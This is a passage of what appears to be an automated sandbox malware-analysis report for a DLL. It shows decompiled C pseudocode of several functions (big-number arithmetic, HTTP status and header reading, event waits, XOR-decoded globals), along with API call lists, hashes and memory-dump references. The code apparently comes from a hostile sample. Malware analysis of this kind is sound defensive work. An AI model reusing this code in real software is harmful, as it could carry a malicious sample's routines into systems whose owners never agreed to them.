                                                  0x00ec5377
                                                  0x00ec537d
                                                  0x00ec538a
                                                  0x00ec538e
                                                  0x00ec5394
                                                  0x00ec5397
                                                  0x00ec539d
                                                  0x00ec53a3
                                                  0x00ec53a9
                                                  0x00ec53ac
                                                  0x00ec53af
                                                  0x00ec53b5
                                                  0x00ec53be
                                                  0x00ec53c4
                                                  0x00ec53c5
                                                  0x00ec53c8
                                                  0x00ec53c9
                                                  0x00ec53ca
                                                  0x00ec53d2
                                                  0x00ec53d3
                                                  0x00ec53d4
                                                  0x00ec53d6
                                                  0x00ec53da
                                                  0x00ec53de
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec53e4
                                                  0x00ec53ed
                                                  0x00ec53f3
                                                  0x00ec53fd
                                                  0x00ec5401
                                                  0x00ec5403
                                                  0x00ec5410
                                                  0x00ec5414
                                                  0x00ec541c
                                                  0x00ec5421
                                                  0x00ec5433
                                                  0x00ec5435
                                                  0x00ec543b
                                                  0x00ec543b
                                                  0x00ec5444
                                                  0x00ec5444
                                                  0x00ec5446
                                                  0x00ec544c
                                                  0x00ec544c
                                                  0x00ec544f
                                                  0x00ec5455
                                                  0x00ec5458
                                                  0x00ec5461
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec5461
                                                  0x00ec53b5
                                                  0x00ec53af
                                                  0x00ec5397
                                                  0x00ec5467
                                                  0x00ec5467
                                                  0x00ec546d
                                                  0x00ec546d
                                                  0x00ec5473
                                                  0x00ec5473
                                                  0x00ec547c
                                                  0x00ec5482
                                                  0x00ec5482
                                                  0x00ec533e
                                                  0x00ec548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00ECC2B0), ref: 00EC5349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00EC542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC5444
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC5473
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 66118f15928df1143524c1f69bf6a54999dc7c6189378f16f245fc252d69b6bb
                                                  • Instruction ID: 8939efe57b28daa473ef168fa269c9d65ae0760e307d20cc4c768472873ee512
                                                  • Opcode Fuzzy Hash: 66118f15928df1143524c1f69bf6a54999dc7c6189378f16f245fc252d69b6bb
                                                  • Instruction Fuzzy Hash: 2D515F72D00509DFCB04DFA8C988DAEB7B9FF88705B144598E915FB210D732AD82CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC1017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00EC1017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00ECA7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00EC968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00EC8967(_t101,  &_v236, _a8, _t96 - _t81);
					E00EC8967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00EC968F(_t101, 0xecd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00EC968F(_a16, _a4);
						E00EC1D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00ECB0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00ECB0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00EC1FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00EC8B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00EC9100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xecd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                  0x00ec101a
                                                  0x00ec1026
                                                  0x00ec102c
                                                  0x00ec1031
                                                  0x00ec1035
                                                  0x00ec1192
                                                  0x00ec1196
                                                  0x00ec1196
                                                  0x00ec103b
                                                  0x00ec103f
                                                  0x00ec1045
                                                  0x00ec1046
                                                  0x00ec1051
                                                  0x00ec1057
                                                  0x00ec105c
                                                  0x00ec105f
                                                  0x00ec1079
                                                  0x00ec1085
                                                  0x00ec108e
                                                  0x00ec1098
                                                  0x00ec109d
                                                  0x00ec109f
                                                  0x00ec10a2
                                                  0x00ec1150
                                                  0x00ec1156
                                                  0x00ec1167
                                                  0x00ec117a
                                                  0x00ec118a
                                                  0x00000000
                                                  0x00ec118f
                                                  0x00ec10ab
                                                  0x00ec10b2
                                                  0x00ec10b6
                                                  0x00ec10bc
                                                  0x00ec10be
                                                  0x00ec10c0
                                                  0x00ec10c2
                                                  0x00ec10c4
                                                  0x00ec10ce
                                                  0x00ec10d3
                                                  0x00ec10d5
                                                  0x00ec10d7
                                                  0x00ec10d8
                                                  0x00ec10d9
                                                  0x00ec10da
                                                  0x00ec10e1
                                                  0x00ec10e8
                                                  0x00ec10eb
                                                  0x00ec10eb
                                                  0x00ec10b8
                                                  0x00ec10b8
                                                  0x00ec10b8
                                                  0x00ec10f3
                                                  0x00ec10fb
                                                  0x00ec1104
                                                  0x00ec1109
                                                  0x00ec1109
                                                  0x00ec110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec1110
                                                  0x00ec1113
                                                  0x00ec111d
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec111f
                                                  0x00ec111f
                                                  0x00ec1129
                                                  0x00ec1109
                                                  0x00ec110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec110e
                                                  0x00ec1133
                                                  0x00ec1136
                                                  0x00ec1139
                                                  0x00ec1140
                                                  0x00ec1140
                                                  0x00ec114d
                                                  0x00000000
                                                  0x00ec114d
                                                  0x00ec1048
                                                  0x00ec104c
                                                  0x00ec104d
                                                  0x00ec104f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec104f
                                                  0x00000000

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00EC10C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00EC10DA
                                                  • memset.NTDLL ref: 00EC117A
                                                  • memset.NTDLL ref: 00EC118A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 7b22694581abfbf51d103dce11005f17e515017af16e1ac772d312647597a643
                                                  • Instruction ID: c1422eaad72df3f169f5b1f896ee6151c6067a48ea99e372dabbbb7471243e5b
                                                  • Opcode Fuzzy Hash: 7b22694581abfbf51d103dce11005f17e515017af16e1ac772d312647597a643
                                                  • Instruction Fuzzy Hash: 0241D331A00249AFDB109FA8DE42FEE77B4EF45310F10956DF91AB7182DB729D568B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECA9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 00ECA9BD
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • ResetEvent.KERNEL32(?), ref: 00ECAA31
                                                  • GetLastError.KERNEL32 ref: 00ECAA54
                                                  • GetLastError.KERNEL32 ref: 00ECAAFF
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 9a7403faf6094f8a31c09a333281cbca772ff5c2a358a711e1dfb421573a24e5
                                                  • Instruction ID: 18766c24502820c73b0c0b99fe639d815bae3acba6f604834104572375228f97
                                                  • Opcode Fuzzy Hash: 9a7403faf6094f8a31c09a333281cbca772ff5c2a358a711e1dfb421573a24e5
                                                  • Instruction Fuzzy Hash: 90419F71500208BFD7219FA6DE49EAB7ABDEB85708B18493DF502F10A0E7739946CA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC39BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E00EC39BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0xecd134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0xecd168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E00EC2049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0xecd134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E00EC9039(_v16);
							if(_t58 == 0) {
								_t58 = E00EC7A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E00EC1C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E00EC1C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                  0x00ec39bf
                                                  0x00ec39ce
                                                  0x00ec39d3
                                                  0x00ec39d5
                                                  0x00ec39da
                                                  0x00ec39db
                                                  0x00ec39e0
                                                  0x00ec39e1
                                                  0x00ec39ec
                                                  0x00ec3a1d
                                                  0x00ec3a22
                                                  0x00ec3ae5
                                                  0x00ec3ae8
                                                  0x00ec3aee
                                                  0x00ec3aee
                                                  0x00ec3a2f
                                                  0x00ec3a37
                                                  0x00ec3ae2
                                                  0x00000000
                                                  0x00ec3ae2
                                                  0x00ec3a42
                                                  0x00ec3a49
                                                  0x00ec3a4c
                                                  0x00ec3ad4
                                                  0x00ec3ad5
                                                  0x00ec3ad5
                                                  0x00ec3adb
                                                  0x00000000
                                                  0x00ec3adb
                                                  0x00ec3a52
                                                  0x00ec3a54
                                                  0x00ec3a5a
                                                  0x00ec3a5b
                                                  0x00ec3a5b
                                                  0x00ec3a5e
                                                  0x00ec3a61
                                                  0x00ec3a67
                                                  0x00ec3a6c
                                                  0x00ec3a6d
                                                  0x00ec3a72
                                                  0x00ec3a75
                                                  0x00ec3a80
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3a88
                                                  0x00ec3a90
                                                  0x00ec3ab9
                                                  0x00ec3abc
                                                  0x00ec3ac3
                                                  0x00ec3ace
                                                  0x00ec3ace
                                                  0x00000000
                                                  0x00ec3ac3
                                                  0x00ec3a9c
                                                  0x00ec3aa0
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3aa2
                                                  0x00ec3aa7
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3aa9
                                                  0x00ec3aa9
                                                  0x00ec3aae
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3ab0
                                                  0x00ec3ab1
                                                  0x00ec3ab4
                                                  0x00ec3ab4
                                                  0x00ec3a5b
                                                  0x00ec39f4
                                                  0x00ec39fc
                                                  0x00ec3a15
                                                  0x00ec3a17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3a17
                                                  0x00ec3a08
                                                  0x00ec3a0c
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3a12
                                                  0x00000000

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 00EC39D5
                                                  • GetLastError.KERNEL32 ref: 00EC39EE
                                                    • Part of subcall function 00EC1C47: WaitForMultipleObjects.KERNEL32(00000002,00ECAA72,00000000,00ECAA72,?,?,?,00ECAA72,0000EA60), ref: 00EC1C62
                                                  • ResetEvent.KERNEL32(?), ref: 00EC3A67
                                                  • GetLastError.KERNEL32 ref: 00EC3A82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 077c70c1d19aff6217f61981ef3a4f23c79f4f12e78eced03ff4817327b639ab
                                                  • Instruction ID: 56f9ec7d7e8f28ae18cd10ab76e93464db774f2e89223b5ba0c48218067b3312
                                                  • Opcode Fuzzy Hash: 077c70c1d19aff6217f61981ef3a4f23c79f4f12e78eced03ff4817327b639ab
                                                  • Instruction Fuzzy Hash: 3331D532600604AFCB11DBB5CD44FAEB7B9EF84354F24456DE595B3190E732EA678B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC42EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E00EC42EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xecd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xecd27c; // 0x213a5a8
				_t3 = _t8 + 0xece862; // 0x61636f4c
				_t25 = 0;
				_t30 = E00EC7A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xecd2a8, 1, 0, _t30);
					E00EC9039(_t30);
				}
				_t12 =  *0xecd25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00EC757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00EC205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xecd0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00ECA501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                  0x00ec42eb
                                                  0x00ec42f2
                                                  0x00ec42fc
                                                  0x00ec4300
                                                  0x00ec4306
                                                  0x00ec4315
                                                  0x00ec431c
                                                  0x00ec4320
                                                  0x00ec4332
                                                  0x00ec4334
                                                  0x00ec4334
                                                  0x00ec4339
                                                  0x00ec4340
                                                  0x00ec4395
                                                  0x00ec4395
                                                  0x00ec439b
                                                  0x00ec439d
                                                  0x00ec439d
                                                  0x00ec43a7
                                                  0x00ec43ab
                                                  0x00ec43bd
                                                  0x00ec43bd
                                                  0x00ec43c1
                                                  0x00ec43c7
                                                  0x00ec43c7
                                                  0x00000000
                                                  0x00ec4359
                                                  0x00ec435e
                                                  0x00ec4366
                                                  0x00ec4368
                                                  0x00ec436c
                                                  0x00ec436c
                                                  0x00ec4379
                                                  0x00ec437d
                                                  0x00ec4381
                                                  0x00ec43d6
                                                  0x00ec43dc
                                                  0x00ec43dc
                                                  0x00ec438f
                                                  0x00ec4393
                                                  0x00ec43ca
                                                  0x00ec43cc
                                                  0x00ec43cf
                                                  0x00ec43cf
                                                  0x00000000
                                                  0x00ec43cc
                                                  0x00ec4393
                                                  0x00000000
                                                  0x00ec437d

                                                  APIs
                                                    • Part of subcall function 00EC7A9A: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00EC96DA,74666F53,00000000,#,00ECD00C,?,00EC23E9), ref: 00EC7AD0
                                                    • Part of subcall function 00EC7A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7AF4
                                                    • Part of subcall function 00EC7A9A: lstrcat.KERNEL32(00000000,00000000), ref: 00EC7AFC
                                                  • CreateEventA.KERNEL32(00ECD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00EC3CA0,?,00000001,?), ref: 00EC432B
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00EC3CA0,00000000,00000000,?,00000000,?,00EC3CA0,?,00000001,?,?,?,?,00EC6880), ref: 00EC4389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00EC3CA0,?,00000001,?), ref: 00EC43B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00EC3CA0,?,00000001,?,?,?,?,00EC6880), ref: 00EC43CF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 26e0c948d7a0ee989c2a8379314c0ccc6cd24369017926ca307f1f2c1fcdcfab
                                                  • Instruction ID: 4106a67848ef9d7b3daa5f847c04a81b19728315d19f67c67f2e829574c7a5f1
                                                  • Opcode Fuzzy Hash: 26e0c948d7a0ee989c2a8379314c0ccc6cd24369017926ca307f1f2c1fcdcfab
                                                  • Instruction Fuzzy Hash: CF2122B25002819BC7316BAD9E55F6A73E8EBC8724B15223DF955FB290E663CC038690
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECA0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E00ECA0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0xecd144; // 0xecad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00EC2049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E00EC9039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00EC1C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                  0x00eca0b2
                                                  0x00eca0b2
                                                  0x00eca0bc
                                                  0x00eca0c2
                                                  0x00eca0c5
                                                  0x00eca0c9
                                                  0x00eca0d1
                                                  0x00eca0d4
                                                  0x00eca0ed
                                                  0x00eca0f0
                                                  0x00eca0f4
                                                  0x00eca0f8
                                                  0x00eca0f9
                                                  0x00eca0fe
                                                  0x00eca101
                                                  0x00eca108
                                                  0x00eca10f
                                                  0x00eca162
                                                  0x00eca16b
                                                  0x00eca16e
                                                  0x00eca1a9
                                                  0x00eca1af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00eca16e
                                                  0x00eca115
                                                  0x00000000
                                                  0x00eca11c
                                                  0x00eca12a
                                                  0x00eca12d
                                                  0x00eca130
                                                  0x00eca13c
                                                  0x00eca140
                                                  0x00eca1a2
                                                  0x00eca142
                                                  0x00eca145
                                                  0x00eca149
                                                  0x00eca14a
                                                  0x00eca14b
                                                  0x00eca14d
                                                  0x00eca154
                                                  0x00eca192
                                                  0x00eca19d
                                                  0x00eca156
                                                  0x00eca159
                                                  0x00eca15d
                                                  0x00eca15d
                                                  0x00eca154
                                                  0x00000000
                                                  0x00eca140
                                                  0x00eca115
                                                  0x00eca0d9
                                                  0x00eca0df
                                                  0x00eca0e4
                                                  0x00eca0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00eca177
                                                  0x00eca17f
                                                  0x00eca186
                                                  0x00eca186
                                                  0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 00ECA0C9
                                                  • SetEvent.KERNEL32(?), ref: 00ECA0D9
                                                  • GetLastError.KERNEL32 ref: 00ECA162
                                                    • Part of subcall function 00EC1C47: WaitForMultipleObjects.KERNEL32(00000002,00ECAA72,00000000,00ECAA72,?,?,?,00ECAA72,0000EA60), ref: 00EC1C62
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • GetLastError.KERNEL32(00000000), ref: 00ECA197
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 1bf20daf770f3d578db069d563af8f5a8a8a2cbbf7c8c60aac5253c561ad1749
                                                  • Instruction ID: 05443070dc063b3322bdaea1563407823ee5040143a0e831a32997aa990d886f
                                                  • Opcode Fuzzy Hash: 1bf20daf770f3d578db069d563af8f5a8a8a2cbbf7c8c60aac5253c561ad1749
                                                  • Instruction Fuzzy Hash: 34311CB590020CEFDB20DFD5CD80EAEBBB8EB04348F18557EE502E2151D7329E4A9B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC3BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 40%
